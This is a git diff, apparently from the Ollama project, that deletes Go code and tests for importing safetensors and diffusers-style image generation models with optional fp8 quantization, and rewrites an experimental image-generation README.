-	if configLayer.Digest == "" {
-		return fmt.Errorf("config.json not found in %s", modelDir)
-	}
-
-	fn(fmt.Sprintf("writing manifest for %s", modelName))
-
-	if err := writeManifest(modelName, configLayer, layers); err != nil {
-		return fmt.Errorf("failed to write manifest: %w", err)
-	}
-
-	fn(fmt.Sprintf("successfully imported %s with %d layers", modelName, len(layers)))
-	return nil
-}
--- a/x/create/create_test.go
+++ b/x/create/create_test.go
@@ -1,752 +0,0 @@
-package create
-
-import (
-	"bytes"
-	"encoding/binary"
-	"encoding/json"
-	"io"
-	"os"
-	"path/filepath"
-	"strings"
-	"testing"
-)
-
-func TestIsTensorModelDir(t *testing.T) {
-	tests := []struct {
-		name     string
-		setup    func(dir string) error
-		expected bool
-	}{
-		{
-			name: "valid diffusers model with model_index.json",
-			setup: func(dir string) error {
-				return os.WriteFile(filepath.Join(dir, "model_index.json"), []byte(`{"_class_name": "FluxPipeline"}`), 0o644)
-			},
-			expected: true,
-		},
-		{
-			name: "empty directory",
-			setup: func(dir string) error {
-				return nil
-			},
-			expected: false,
-		},
-		{
-			name: "directory with other files but no model_index.json",
-			setup: func(dir string) error {
-				return os.WriteFile(filepath.Join(dir, "config.json"), []byte(`{}`), 0o644)
-			},
-			expected: false,
-		},
-	}
-
-	for _, tt := range tests {
-		t.Run(tt.name, func(t *testing.T) {
-			dir := t.TempDir()
-			if err := tt.setup(dir); err != nil {
-				t.Fatalf("setup failed: %v", err)
-			}
-
-			got := IsTensorModelDir(dir)
-			if got != tt.expected {
-				t.Errorf("IsTensorModelDir() = %v, want %v", got, tt.expected)
-			}
-		})
-	}
-}
-
-func TestIsSafetensorsModelDir(t *testing.T) {
-	tests := []struct {
-		name     string
-		setup    func(dir string) error
-		expected bool
-	}{
-		{
-			name: "valid safetensors model with config.json and .safetensors file",
-			setup: func(dir string) error {
-				if err := os.WriteFile(filepath.Join(dir, "config.json"), []byte(`{"model_type": "gemma3"}`), 0o644); err != nil {
-					return err
-				}
-				return os.WriteFile(filepath.Join(dir, "model.safetensors"), []byte("dummy"), 0o644)
-			},
-			expected: true,
-		},
-		{
-			name: "config.json only, no safetensors files",
-			setup: func(dir string) error {
-				return os.WriteFile(filepath.Join(dir, "config.json"), []byte(`{}`), 0o644)
-			},
-			expected: false,
-		},
-		{
-			name: "safetensors file only, no config.json",
-			setup: func(dir string) error {
-				return os.WriteFile(filepath.Join(dir, "model.safetensors"), []byte("dummy"), 0o644)
-			},
-			expected: false,
-		},
-		{
-			name: "empty directory",
-			setup: func(dir string) error {
-				return nil
-			},
-			expected: false,
-		},
-		{
-			name: "multiple safetensors files with config.json",
-			setup: func(dir string) error {
-				if err := os.WriteFile(filepath.Join(dir, "config.json"), []byte(`{}`), 0o644); err != nil {
-					return err
-				}
-				if err := os.WriteFile(filepath.Join(dir, "model-00001-of-00002.safetensors"), []byte("dummy"), 0o644); err != nil {
-					return err
-				}
-				return os.WriteFile(filepath.Join(dir, "model-00002-of-00002.safetensors"), []byte("dummy"), 0o644)
-			},
-			expected: true,
-		},
-	}
-
-	for _, tt := range tests {
-		t.Run(tt.name, func(t *testing.T) {
-			dir := t.TempDir()
-			if err := tt.setup(dir); err != nil {
-				t.Fatalf("setup failed: %v", err)
-			}
-
-			got := IsSafetensorsModelDir(dir)
-			if got != tt.expected {
-				t.Errorf("IsSafetensorsModelDir() = %v, want %v", got, tt.expected)
-			}
-		})
-	}
-}
-
-func TestIsSafetensorsModelDir_NonexistentDir(t *testing.T) {
-	got := IsSafetensorsModelDir("/nonexistent/path/that/does/not/exist")
-	if got != false {
-		t.Errorf("IsSafetensorsModelDir() = %v for nonexistent dir, want false", got)
-	}
-}
-
-// createMinimalSafetensors creates a minimal valid safetensors file with one tensor
-func createMinimalSafetensors(t *testing.T, path string) {
-	t.Helper()
-
-	// Create a minimal safetensors file with a single float32 tensor
-	header := map[string]interface{}{
-		"test_tensor": map[string]interface{}{
-			"dtype":        "F32",
-			"shape":        []int{2, 2},
-			"data_offsets": []int{0, 16}, // 4 float32 values = 16 bytes
-		},
-	}
-	headerJSON, err := json.Marshal(header)
-	if err != nil {
-		t.Fatalf("failed to marshal header: %v", err)
-	}
-
-	// Pad header to 8-byte alignment
-	padding := (8 - len(headerJSON)%8) % 8
-	headerJSON = append(headerJSON, bytes.Repeat([]byte(" "), padding)...)
-
-	// Write file
-	f, err := os.Create(path)
-	if err != nil {
-		t.Fatalf("failed to create file: %v", err)
-	}
-	defer f.Close()
-
-	// Write header size (8 bytes, little endian)
-	if err := binary.Write(f, binary.LittleEndian, uint64(len(headerJSON))); err != nil {
-		t.Fatalf("failed to write header size: %v", err)
-	}
-
-	// Write header
-	if _, err := f.Write(headerJSON); err != nil {
-		t.Fatalf("failed to write header: %v", err)
-	}
-
-	// Write tensor data (16 bytes of zeros for 4 float32 values)
-	if _, err := f.Write(make([]byte, 16)); err != nil {
-		t.Fatalf("failed to write tensor data: %v", err)
-	}
-}
-
-func TestCreateSafetensorsModel(t *testing.T) {
-	dir := t.TempDir()
-
-	// Create config.json
-	configJSON := `{"model_type": "test", "architectures": ["TestModel"]}`
-	if err := os.WriteFile(filepath.Join(dir, "config.json"), []byte(configJSON), 0o644); err != nil {
-		t.Fatalf("failed to write config.json: %v", err)
-	}
-
-	// Create a minimal safetensors file
-	createMinimalSafetensors(t, filepath.Join(dir, "model.safetensors"))
-
-	// Track what was created
-	var createdLayers []LayerInfo
-	var manifestWritten bool
-	var manifestModelName string
-	var manifestConfigLayer LayerInfo
-	var manifestLayers []LayerInfo
-	var statusMessages []string
-
-	// Mock callbacks
-	createLayer := func(r io.Reader, mediaType, name string) (LayerInfo, error) {
-		data, err := io.ReadAll(r)
-		if err != nil {
-			return LayerInfo{}, err
-		}
-		layer := LayerInfo{
-			Digest:    "sha256:test",
-			Size:      int64(len(data)),
-			MediaType: mediaType,
-			Name:      name,
-		}
-		createdLayers = append(createdLayers, layer)
-		return layer, nil
-	}
-
-	createTensorLayer := func(r io.Reader, name, dtype string, shape []int32, quantize string) ([]LayerInfo, error) {
-		data, err := io.ReadAll(r)
-		if err != nil {
-			return nil, err
-		}
-		layer := LayerInfo{
-			Digest:    "sha256:tensor_" + name,
-			Size:      int64(len(data)),
-			MediaType: "application/vnd.ollama.image.tensor",
-			Name:      name,
-		}
-		createdLayers = append(createdLayers, layer)
-		return []LayerInfo{layer}, nil
-	}
-
-	writeManifest := func(modelName string, config LayerInfo, layers []LayerInfo) error {
-		manifestWritten = true
-		manifestModelName = modelName
-		manifestConfigLayer = config
-		manifestLayers = layers
-		return nil
-	}
-
-	progressFn := func(status string) {
-		statusMessages = append(statusMessages, status)
-	}
-
-	// Run CreateSafetensorsModel
-	err := CreateSafetensorsModel("test-model", dir, "", createLayer, createTensorLayer, writeManifest, progressFn)
-	if err != nil {
-		t.Fatalf("CreateSafetensorsModel failed: %v", err)
-	}
-
-	// Verify manifest was written
-	if !manifestWritten {
-		t.Error("manifest was not written")
-	}
-
-	if manifestModelName != "test-model" {
-		t.Errorf("manifest model name = %q, want %q", manifestModelName, "test-model")
-	}
-
-	// Verify config layer was set
-	if manifestConfigLayer.Name != "config.json" {
-		t.Errorf("config layer name = %q, want %q", manifestConfigLayer.Name, "config.json")
-	}
-
-	// Verify we have at least one tensor and one config layer
-	hasTensor := false
-	hasConfig := false
-	for _, layer := range manifestLayers {
-		if layer.Name == "test_tensor" {
-			hasTensor = true
-		}
-		if layer.Name == "config.json" {
-			hasConfig = true
-		}
-	}
-
-	if !hasTensor {
-		t.Error("no tensor layer found in manifest")
-	}
-	if !hasConfig {
-		t.Error("no config layer found in manifest")
-	}
-
-	// Verify status messages were sent
-	if len(statusMessages) == 0 {
-		t.Error("no status messages received")
-	}
-}
-
-func TestCreateSafetensorsModel_NoConfigJson(t *testing.T) {
-	dir := t.TempDir()
-
-	// Create only a safetensors file, no config.json
-	createMinimalSafetensors(t, filepath.Join(dir, "model.safetensors"))
-
-	// Mock callbacks (minimal)
-	createLayer := func(r io.Reader, mediaType, name string) (LayerInfo, error) {
-		io.ReadAll(r)
-		return LayerInfo{Name: name}, nil
-	}
-	createTensorLayer := func(r io.Reader, name, dtype string, shape []int32, quantize string) ([]LayerInfo, error) {
-		io.ReadAll(r)
-		return []LayerInfo{{Name: name}}, nil
-	}
-	writeManifest := func(modelName string, config LayerInfo, layers []LayerInfo) error {
-		return nil
-	}
-	progressFn := func(status string) {}
-
-	err := CreateSafetensorsModel("test-model", dir, "", createLayer, createTensorLayer, writeManifest, progressFn)
-	if err == nil {
-		t.Error("expected error for missing config.json, got nil")
-	}
-}
-
-func TestCreateSafetensorsModel_EmptyDir(t *testing.T) {
-	dir := t.TempDir()
-
-	// Mock callbacks
-	createLayer := func(r io.Reader, mediaType, name string) (LayerInfo, error) {
-		return LayerInfo{}, nil
-	}
-	createTensorLayer := func(r io.Reader, name, dtype string, shape []int32, quantize string) ([]LayerInfo, error) {
-		return []LayerInfo{{}}, nil
-	}
-	writeManifest := func(modelName string, config LayerInfo, layers []LayerInfo) error {
-		return nil
-	}
-	progressFn := func(status string) {}
-
-	err := CreateSafetensorsModel("test-model", dir, "", createLayer, createTensorLayer, writeManifest, progressFn)
-	if err == nil {
-		t.Error("expected error for empty directory, got nil")
-	}
-}
-
-func TestCreateSafetensorsModel_SkipsIndexJson(t *testing.T) {
-	dir := t.TempDir()
-
-	// Create config.json
-	if err := os.WriteFile(filepath.Join(dir, "config.json"), []byte(`{}`), 0o644); err != nil {
-		t.Fatalf("failed to write config.json: %v", err)
-	}
-
-	// Create model.safetensors.index.json (should be skipped)
-	indexJSON := `{"metadata": {"total_size": 100}, "weight_map": {}}`
-	if err := os.WriteFile(filepath.Join(dir, "model.safetensors.index.json"), []byte(indexJSON), 0o644); err != nil {
-		t.Fatalf("failed to write index.json: %v", err)
-	}
-
-	// Create a minimal safetensors file
-	createMinimalSafetensors(t, filepath.Join(dir, "model.safetensors"))
-
-	var configNames []string
-
-	createLayer := func(r io.Reader, mediaType, name string) (LayerInfo, error) {
-		io.ReadAll(r)
-		configNames = append(configNames, name)
-		return LayerInfo{Name: name, Digest: "sha256:test"}, nil
-	}
-	createTensorLayer := func(r io.Reader, name, dtype string, shape []int32, quantize string) ([]LayerInfo, error) {
-		io.ReadAll(r)
-		return []LayerInfo{{Name: name}}, nil
-	}
-	writeManifest := func(modelName string, config LayerInfo, layers []LayerInfo) error {
-		return nil
-	}
-	progressFn := func(status string) {}
-
-	err := CreateSafetensorsModel("test-model", dir, "", createLayer, createTensorLayer, writeManifest, progressFn)
-	if err != nil {
-		t.Fatalf("CreateSafetensorsModel failed: %v", err)
-	}
-
-	// Verify model.safetensors.index.json was not included
-	for _, name := range configNames {
-		if name == "model.safetensors.index.json" {
-			t.Error("model.safetensors.index.json should have been skipped")
-		}
-	}
-}
-
-func TestResolveManifestPath(t *testing.T) {
-	tests := []struct {
-		name      string
-		modelName string
-		wantParts []string // Parts that should appear in the path
-	}{
-		{
-			name:      "simple model name",
-			modelName: "llama2",
-			wantParts: []string{"registry.ollama.ai", "library", "llama2", "latest"},
-		},
-		{
-			name:      "model name with tag",
-			modelName: "llama2:7b",
-			wantParts: []string{"registry.ollama.ai", "library", "llama2", "7b"},
-		},
-		{
-			name:      "model name with namespace",
-			modelName: "myuser/mymodel",
-			wantParts: []string{"registry.ollama.ai", "myuser", "mymodel", "latest"},
-		},
-		{
-			name:      "model name with namespace and tag",
-			modelName: "myuser/mymodel:v1",
-			wantParts: []string{"registry.ollama.ai", "myuser", "mymodel", "v1"},
-		},
-		{
-			name:      "fully qualified model name",
-			modelName: "registry.example.com/namespace/model:tag",
-			wantParts: []string{"registry.example.com", "namespace", "model", "tag"},
-		},
-	}
-
-	for _, tt := range tests {
-		t.Run(tt.name, func(t *testing.T) {
-			got := resolveManifestPath(tt.modelName)
-
-			for _, part := range tt.wantParts {
-				if !strings.Contains(got, part) {
-					t.Errorf("resolveManifestPath(%q) = %q, missing part %q", tt.modelName, got, part)
-				}
-			}
-		})
-	}
-}
-
-func TestLayerInfo(t *testing.T) {
-	layer := LayerInfo{
-		Digest:    "sha256:abc123",
-		Size:      1024,
-		MediaType: "application/vnd.ollama.image.tensor",
-		Name:      "model.weight",
-	}
-
-	if layer.Digest != "sha256:abc123" {
-		t.Errorf("Digest = %q, want %q", layer.Digest, "sha256:abc123")
-	}
-	if layer.Size != 1024 {
-		t.Errorf("Size = %d, want %d", layer.Size, 1024)
-	}
-	if layer.MediaType != "application/vnd.ollama.image.tensor" {
-		t.Errorf("MediaType = %q, want %q", layer.MediaType, "application/vnd.ollama.image.tensor")
-	}
-	if layer.Name != "model.weight" {
-		t.Errorf("Name = %q, want %q", layer.Name, "model.weight")
-	}
-}
-
-func TestModelConfig(t *testing.T) {
-	config := ModelConfig{
-		ModelFormat:  "safetensors",
-		Capabilities: []string{"completion", "chat"},
-	}
-
-	if config.ModelFormat != "safetensors" {
-		t.Errorf("ModelFormat = %q, want %q", config.ModelFormat, "safetensors")
-	}
-	if len(config.Capabilities) != 2 {
-		t.Errorf("Capabilities length = %d, want %d", len(config.Capabilities), 2)
-	}
-}
-
-func TestManifest(t *testing.T) {
-	manifest := Manifest{
-		SchemaVersion: 2,
-		MediaType:     "application/vnd.oci.image.manifest.v1+json",
-		Config: ManifestLayer{
-			MediaType: "application/vnd.docker.container.image.v1+json",
-			Digest:    "sha256:config",
-			Size:      100,
-		},
-		Layers: []ManifestLayer{
-			{
-				MediaType: "application/vnd.ollama.image.tensor",
-				Digest:    "sha256:layer1",
-				Size:      1000,
-				Name:      "weight.bin",
-			},
-		},
-	}
-
-	if manifest.SchemaVersion != 2 {
-		t.Errorf("SchemaVersion = %d, want %d", manifest.SchemaVersion, 2)
-	}
-	if manifest.Config.Digest != "sha256:config" {
-		t.Errorf("Config.Digest = %q, want %q", manifest.Config.Digest, "sha256:config")
-	}
-	if len(manifest.Layers) != 1 {
-		t.Errorf("Layers length = %d, want %d", len(manifest.Layers), 1)
-	}
-	if manifest.Layers[0].Name != "weight.bin" {
-		t.Errorf("Layers[0].Name = %q, want %q", manifest.Layers[0].Name, "weight.bin")
-	}
-}
-
-func TestShouldQuantize(t *testing.T) {
-	tests := []struct {
-		name      string
-		tensor    string
-		component string
-		want      bool
-	}{
-		// VAE component should never be quantized
-		{"vae weight", "decoder.weight", "vae", false},
-		{"vae bias", "decoder.bias", "vae", false},
-
-		// Embeddings should not be quantized
-		{"embedding weight", "embed_tokens.weight", "", false},
-		{"embedding in name", "token_embedding.weight", "", false},
-
-		// Norms should not be quantized
-		{"layer norm", "layer_norm.weight", "", false},
-		{"rms norm", "rms_norm.weight", "", false},
-		{"ln prefix", "ln_1.weight", "", false},
-		{"layernorm in name", "input_layernorm.weight", "", false},
-
-		// Biases should not be quantized
-		{"bias tensor", "attention.bias", "", false},
-		{"proj bias", "o_proj.bias", "", false},
-
-		// Linear weights should be quantized
-		{"linear weight", "q_proj.weight", "", true},
-		{"attention weight", "self_attn.weight", "", true},
-		{"mlp weight", "mlp.gate_proj.weight", "", true},
-
-		// Transformer component weights should be quantized
-		{"transformer weight", "layers.0.weight", "transformer", true},
-		{"text_encoder weight", "encoder.weight", "text_encoder", true},
-	}
-
-	for _, tt := range tests {
-		t.Run(tt.name, func(t *testing.T) {
-			got := ShouldQuantize(tt.tensor, tt.component)
-			if got != tt.want {
-				t.Errorf("ShouldQuantize(%q, %q) = %v, want %v", tt.tensor, tt.component, got, tt.want)
-			}
-		})
-	}
-}
-
-func TestShouldQuantizeTensor(t *testing.T) {
-	tests := []struct {
-		name   string
-		tensor string
-		shape  []int32
-		want   bool
-	}{
-		// 2D tensors with sufficient size should be quantized
-		{"large 2D weight", "q_proj.weight", []int32{4096, 4096}, true},
-		{"medium 2D weight", "small_proj.weight", []int32{128, 128}, true},
-
-		// Small tensors should not be quantized (< 1024 elements)
-		{"tiny 2D weight", "tiny.weight", []int32{16, 16}, false},
-		{"small 2D weight", "small.weight", []int32{31, 31}, false},
-
-		// 1D tensors should not be quantized
-		{"1D tensor", "layer_norm.weight", []int32{4096}, false},
-
-		// 3D+ tensors should not be quantized
-		{"3D tensor", "conv.weight", []int32{64, 64, 3}, false},
-		{"4D tensor", "conv2d.weight", []int32{64, 64, 3, 3}, false},
-
-		// Embeddings should not be quantized regardless of shape
-		{"embedding 2D", "embed_tokens.weight", []int32{32000, 4096}, false},
-
-		// Norms should not be quantized regardless of shape
-		{"norm 2D", "layer_norm.weight", []int32{4096, 1}, false},
-
-		// Biases should not be quantized
-		{"bias 2D", "proj.bias", []int32{4096, 1}, false},
-	}
-
-	for _, tt := range tests {
-		t.Run(tt.name, func(t *testing.T) {
-			got := ShouldQuantizeTensor(tt.tensor, tt.shape)
-			if got != tt.want {
-				t.Errorf("ShouldQuantizeTensor(%q, %v) = %v, want %v", tt.tensor, tt.shape, got, tt.want)
-			}
-		})
-	}
-}
-
-func TestCreateSafetensorsModel_WithQuantize(t *testing.T) {
-	dir := t.TempDir()
-
-	// Create config.json
-	configJSON := `{"model_type": "test", "architectures": ["TestModel"]}`
-	if err := os.WriteFile(filepath.Join(dir, "config.json"), []byte(configJSON), 0o644); err != nil {
-		t.Fatalf("failed to write config.json: %v", err)
-	}
-
-	// Create a minimal safetensors file
-	createMinimalSafetensors(t, filepath.Join(dir, "model.safetensors"))
-
-	var quantizeRequested []string
-
-	createLayer := func(r io.Reader, mediaType, name string) (LayerInfo, error) {
-		io.ReadAll(r)
-		return LayerInfo{Name: name, Digest: "sha256:test"}, nil
-	}
-
-	createTensorLayer := func(r io.Reader, name, dtype string, shape []int32, quantize string) ([]LayerInfo, error) {
-		io.ReadAll(r)
-		quantizeRequested = append(quantizeRequested, quantize)
-		return []LayerInfo{{Name: name}}, nil
-	}
-
-	writeManifest := func(modelName string, config LayerInfo, layers []LayerInfo) error {
-		return nil
-	}
-
-	progressFn := func(status string) {}
-
-	// Run with quantize enabled
-	err := CreateSafetensorsModel("test-model", dir, "fp8", createLayer, createTensorLayer, writeManifest, progressFn)
-	if err != nil {
-		t.Fatalf("CreateSafetensorsModel failed: %v", err)
-	}
-
-	// Verify quantize was passed to callback (will be false for small test tensor)
-	if len(quantizeRequested) == 0 {
-		t.Error("no tensors processed")
-	}
-}
-
-// createMinimalImageGenModel creates a minimal diffusers-style model directory
-func createMinimalImageGenModel(t *testing.T, dir string) {
-	t.Helper()
-
-	// Create model_index.json
-	modelIndex := `{"_class_name": "FluxPipeline", "_diffusers_version": "0.30.0"}`
-	if err := os.WriteFile(filepath.Join(dir, "model_index.json"), []byte(modelIndex), 0o644); err != nil {
-		t.Fatalf("failed to write model_index.json: %v", err)
-	}
-
-	// Create transformer directory with a safetensors file
-	transformerDir := filepath.Join(dir, "transformer")
-	if err := os.MkdirAll(transformerDir, 0o755); err != nil {
-		t.Fatalf("failed to create transformer dir: %v", err)
-	}
-	createMinimalSafetensors(t, filepath.Join(transformerDir, "model.safetensors"))
-
-	// Create transformer config
-	transformerConfig := `{"hidden_size": 3072}`
-	if err := os.WriteFile(filepath.Join(transformerDir, "config.json"), []byte(transformerConfig), 0o644); err != nil {
-		t.Fatalf("failed to write transformer config: %v", err)
-	}
-}
-
-func TestCreateImageGenModel(t *testing.T) {
-	dir := t.TempDir()
-	createMinimalImageGenModel(t, dir)
-
-	var manifestWritten bool
-	var manifestModelName string
-	var statusMessages []string
-
-	createLayer := func(r io.Reader, mediaType, name string) (LayerInfo, error) {
-		io.ReadAll(r)
-		return LayerInfo{Name: name, Digest: "sha256:test"}, nil
-	}
-
-	createTensorLayer := func(r io.Reader, name, dtype string, shape []int32, quantize string) ([]LayerInfo, error) {
-		io.ReadAll(r)
-		return []LayerInfo{{Name: name, Digest: "sha256:tensor"}}, nil
-	}
-
-	writeManifest := func(modelName string, config LayerInfo, layers []LayerInfo) error {
-		manifestWritten = true
-		manifestModelName = modelName
-		return nil
-	}
-
-	progressFn := func(status string) {
-		statusMessages = append(statusMessages, status)
-	}
-
-	err := CreateImageGenModel("test-imagegen", dir, "", createLayer, createTensorLayer, writeManifest, progressFn)
-	if err != nil {
-		t.Fatalf("CreateImageGenModel failed: %v", err)
-	}
-
-	if !manifestWritten {
-		t.Error("manifest was not written")
-	}
-
-	if manifestModelName != "test-imagegen" {
-		t.Errorf("manifest model name = %q, want %q", manifestModelName, "test-imagegen")
-	}
-
-	if len(statusMessages) == 0 {
-		t.Error("no status messages received")
-	}
-}
-
-func TestCreateImageGenModel_NoModelIndex(t *testing.T) {
-	dir := t.TempDir()
-
-	// Create only transformer without model_index.json
-	transformerDir := filepath.Join(dir, "transformer")
-	if err := os.MkdirAll(transformerDir, 0o755); err != nil {
-		t.Fatalf("failed to create transformer dir: %v", err)
-	}
-	createMinimalSafetensors(t, filepath.Join(transformerDir, "model.safetensors"))
-
-	createLayer := func(r io.Reader, mediaType, name string) (LayerInfo, error) {
-		io.ReadAll(r)
-		return LayerInfo{Name: name}, nil
-	}
-	createTensorLayer := func(r io.Reader, name, dtype string, shape []int32, quantize string) ([]LayerInfo, error) {
-		io.ReadAll(r)
-		return []LayerInfo{{Name: name}}, nil
-	}
-	writeManifest := func(modelName string, config LayerInfo, layers []LayerInfo) error {
-		return nil
-	}
-	progressFn := func(status string) {}
-
-	err := CreateImageGenModel("test-imagegen", dir, "", createLayer, createTensorLayer, writeManifest, progressFn)
-	if err == nil {
-		t.Error("expected error for missing model_index.json, got nil")
-	}
-}
-
-func TestCreateImageGenModel_WithQuantize(t *testing.T) {
-	dir := t.TempDir()
-	createMinimalImageGenModel(t, dir)
-
-	var quantizeRequested []string
-
-	createLayer := func(r io.Reader, mediaType, name string) (LayerInfo, error) {
-		io.ReadAll(r)
-		return LayerInfo{Name: name, Digest: "sha256:test"}, nil
-	}
-
-	createTensorLayer := func(r io.Reader, name, dtype string, shape []int32, quantize string) ([]LayerInfo, error) {
-		io.ReadAll(r)
-		quantizeRequested = append(quantizeRequested, quantize)
-		return []LayerInfo{{Name: name}}, nil
-	}
-
-	writeManifest := func(modelName string, config LayerInfo, layers []LayerInfo) error {
-		return nil
-	}
-
-	progressFn := func(status string) {}
-
-	err := CreateImageGenModel("test-imagegen", dir, "fp8", createLayer, createTensorLayer, writeManifest, progressFn)
-	if err != nil {
-		t.Fatalf("CreateImageGenModel failed: %v", err)
-	}
-
-	if len(quantizeRequested) == 0 {
-		t.Error("no tensors processed")
-	}
-}
--- a/x/create/imagegen.go
+++ b/x/create/imagegen.go
@@ -1,222 +0,0 @@
-package create
-
-import (
-	"bytes"
-	"encoding/json"
-	"fmt"
-	"io"
-	"os"
-	"path/filepath"
-	"strings"
-
-	"github.com/ollama/ollama/x/imagegen/safetensors"
-)
-
-// CreateImageGenModel imports an image generation model from a directory.
-// Stores each tensor as a separate blob for fine-grained deduplication.
-// If quantize is specified, linear weights in transformer/text_encoder are quantized.
-// Supported quantization types: fp8 (or empty for no quantization).
-// Layer creation and manifest writing are done via callbacks to avoid import cycles.
-func CreateImageGenModel(modelName, modelDir, quantize string, createLayer LayerCreator, createTensorLayer QuantizingTensorLayerCreator, writeManifest ManifestWriter, fn func(status string)) error {
-	// Validate quantization type
-	switch quantize {
-	case "", "fp4", "fp8":
-		// valid
-	default:
-		return fmt.Errorf("unsupported quantization type %q: supported types are fp4, fp8", quantize)
-	}
-
-	var layers []LayerInfo
-	var configLayer LayerInfo
-	var totalParams int64 // Count parameters from original tensor shapes
-	var torchDtype string // Read from component config for quantization display
-
-	// Components to process - extract individual tensors from each
-	components := []string{"text_encoder", "transformer", "vae"}
-
-	for _, component := range components {
-		componentDir := filepath.Join(modelDir, component)
-		if _, err := os.Stat(componentDir); os.IsNotExist(err) {
-			continue
-		}
-
-		// Find all safetensors files in this component
-		entries, err := os.ReadDir(componentDir)
-		if err != nil {
-			return fmt.Errorf("failed to read %s: %w", component, err)
-		}
-
-		for _, entry := range entries {
-			if !strings.HasSuffix(entry.Name(), ".safetensors") {
-				continue
-			}
-
-			stPath := filepath.Join(componentDir, entry.Name())
-
-			// Extract individual tensors from safetensors file
-			extractor, err := safetensors.OpenForExtraction(stPath)
-			if err != nil {
-				return fmt.Errorf("failed to open %s: %w", stPath, err)
-			}
-
-			tensorNames := extractor.ListTensors()
-			quantizeMsg := ""
-			if quantize != "" && component != "vae" {
-				quantizeMsg = ", quantizing to " + quantize
-			}
-			fn(fmt.Sprintf("importing %s/%s (%d tensors%s)", component, entry.Name(), len(tensorNames), quantizeMsg))
-
-			for _, tensorName := range tensorNames {
-				td, err := extractor.GetTensor(tensorName)
-				if err != nil {
-					extractor.Close()
-					return fmt.Errorf("failed to get tensor %s: %w", tensorName, err)
-				}
-
-				// Count parameters from original tensor shape
-				if len(td.Shape) > 0 {
-					numElements := int64(1)
-					for _, dim := range td.Shape {
-						numElements *= int64(dim)
-					}
-					totalParams += numElements
-				}
-
-				// Store as minimal safetensors format (88 bytes header overhead)
-				// This enables native mmap loading via mlx_load_safetensors
-				// Use path-style name: "component/tensor_name"
-				fullName := component + "/" + tensorName
-
-				// Determine quantization type for this tensor (empty string if not quantizing)
-				quantizeType := ""
-				if quantize != "" && ShouldQuantize(tensorName, component) && canQuantizeShape(td.Shape) {
-					quantizeType = quantize
-				}
-
-				// createTensorLayer returns multiple layers if quantizing (weight + scales)
-				newLayers, err := createTensorLayer(td.SafetensorsReader(), fullName, td.Dtype, td.Shape, quantizeType)
-				if err != nil {
-					extractor.Close()
-					return fmt.Errorf("failed to create layer for %s: %w", fullName, err)
-				}
-				layers = append(layers, newLayers...)
-			}
-
-			extractor.Close()
-		}
-	}
-
-	// Read torch_dtype from text_encoder config for quantization display
-	if torchDtype == "" {
-		textEncoderConfig := filepath.Join(modelDir, "text_encoder/config.json")
-		if data, err := os.ReadFile(textEncoderConfig); err == nil {
-			var cfg struct {
-				TorchDtype string `json:"torch_dtype"`
-			}
-			if json.Unmarshal(data, &cfg) == nil && cfg.TorchDtype != "" {
-				torchDtype = cfg.TorchDtype
-			}
-		}
-	}
-
-	// Import config files
-	configFiles := []string{
-		"model_index.json",
-		"text_encoder/config.json",
-		"text_encoder/generation_config.json",
-		"transformer/config.json",
-		"vae/config.json",
-		"scheduler/scheduler_config.json",
-		"tokenizer/tokenizer.json",
-		"tokenizer/tokenizer_config.json",
-		"tokenizer/vocab.json",
-	}
-
-	for _, cfgPath := range configFiles {
-		fullPath := filepath.Join(modelDir, cfgPath)
-		if _, err := os.Stat(fullPath); os.IsNotExist(err) {
-			continue
-		}
-
-		fn(fmt.Sprintf("importing config %s", cfgPath))
-
-		var r io.Reader
-
-		// For model_index.json, normalize to Ollama format and add metadata
-		if cfgPath == "model_index.json" {
-			data, err := os.ReadFile(fullPath)
-			if err != nil {
-				return fmt.Errorf("failed to read %s: %w", cfgPath, err)
-			}
-
-			var cfg map[string]any
-			if err := json.Unmarshal(data, &cfg); err != nil {
-				return fmt.Errorf("failed to parse %s: %w", cfgPath, err)
-			}
-
-			// Rename _class_name to architecture, remove diffusers-specific fields
-			if className, ok := cfg["_class_name"]; ok {
-				cfg["architecture"] = className
-				delete(cfg, "_class_name")
-			}
-			delete(cfg, "_diffusers_version")
-
-			// Add parameter count (counted from tensor shapes during import)
-			cfg["parameter_count"] = totalParams
-
-			// Add quantization info - use quantize type if set, otherwise torch_dtype
-			if quantize != "" {
-				cfg["quantization"] = strings.ToUpper(quantize)
-			} else {
-				cfg["quantization"] = torchDtype
-			}
-
-			data, err = json.MarshalIndent(cfg, "", "    ")
-			if err != nil {
-				return fmt.Errorf("failed to marshal %s: %w", cfgPath, err)
-			}
-			r = bytes.NewReader(data)
-		} else {
-			f, err := os.Open(fullPath)
-			if err != nil {
-				return fmt.Errorf("failed to open %s: %w", cfgPath, err)
-			}
-			defer f.Close()
-			r = f
-		}
-
-		layer, err := createLayer(r, "application/vnd.ollama.image.json", cfgPath)
-		if err != nil {
-			return fmt.Errorf("failed to create layer for %s: %w", cfgPath, err)
-		}
-
-		// Use model_index.json as the config layer
-		if cfgPath == "model_index.json" {
-			configLayer = layer
-		}
-
-		layers = append(layers, layer)
-	}
-
-	if configLayer.Digest == "" {
-		return fmt.Errorf("model_index.json not found in %s", modelDir)
-	}
-
-	fn(fmt.Sprintf("writing manifest for %s", modelName))
-
-	if err := writeManifest(modelName, configLayer, layers); err != nil {
-		return fmt.Errorf("failed to write manifest: %w", err)
-	}
-
-	fn(fmt.Sprintf("successfully imported %s with %d layers", modelName, len(layers)))
-	return nil
-}
-
-// canQuantizeShape returns true if a tensor shape is compatible with MLX quantization.
-// MLX requires the last dimension to be divisible by the group size (32).
-func canQuantizeShape(shape []int32) bool {
-	if len(shape) < 2 {
-		return false
-	}
-	return shape[len(shape)-1]%32 == 0
-}
--- a/x/imagegen/README.md
+++ b/x/imagegen/README.md
@@ -1,250 +1,61 @@
-# Image Generation in Ollama (Experimental)
+# imagegen

-Generate images from text prompts using local AI models.
+This is a package that uses MLX to run image generation models, ahead of being integrated into Ollama's primary runner.
+in `CMakeLists.txt` and rebuild.

-## Quick Start
+### 1. Download a Model
+
+Download Llama 3.1 8B (or any compatible model) in safetensors format:

 ```bash
-# Run with a prompt
-ollama run z-image "a sunset over mountains"
-Generating: step 30/30
-Image saved to: /tmp/ollama-image-1704067200.png
+mkdir -p ./weights
+
+# Example using huggingface-cli
+hf download meta-llama/Llama-3.1-8B --local-dir ./weights/Llama-3.1-8B
+hf download openai/gpt-oss-20b --local-dir ./weights/gpt-oss-20b
 ```

-On macOS, the generated image will automatically open in Preview.
-
-## Supported Models
-
-| Model | VRAM Required | Notes |
-|-------|---------------|-------|
-| z-image | ~12GB | Based on Flux architecture |
-
-## CLI Usage
+### 2. Run Inference

 ```bash
-# Generate an image
